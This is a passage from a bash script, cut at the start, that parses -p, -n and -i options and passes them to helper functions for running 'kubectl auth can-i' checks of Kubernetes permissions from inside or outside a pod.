[TYPE] [options]\"]" 118 | echo " [From inside a pod]: $0 [-i \"VERB [TYPE] [options]\"]" 119 | echo 120 | echo "Options: " 121 | echo 122 | printf " -p\tPod Name\n" 123 | printf " -n\tNamespace\n" 124 | printf " -i\tArugments that you would normally pass to kubectl auth can-i []\n" 125 | echo 126 | exit 1 127 | } 128 | 129 | while getopts n:p:i: flag 130 | do 131 | case "${flag}" in 132 | n) namespace=${OPTARG};; 133 | p) pod=${OPTARG};; 134 | i) user_input=${OPTARG};; 135 | *) usage;; 136 | esac 137 | done 138 | 139 | if [[ -z "$user_input" ]]; then 140 | user_input="--list" 141 | fi 142 | 143 | 144 | 145 | if [[ "$namespace" ]] && [[ "$pod" ]]; then 146 | #echo "outside" 147 | check-can-exec-pod 148 | run-outside-pod 149 | 150 | elif [[ -z "$namespace" ]] && [[ -z "$pod" ]]; then 151 | #echo "inside" 152 | am-i-inside-pod-check 153 | run-inside-pod 154 | else 155 | echo "If running this script from outside a pod, you need to specify both the pod name and the namespace" 156 | usage 157 | fi 158 | --------------------------------------------------------------------------------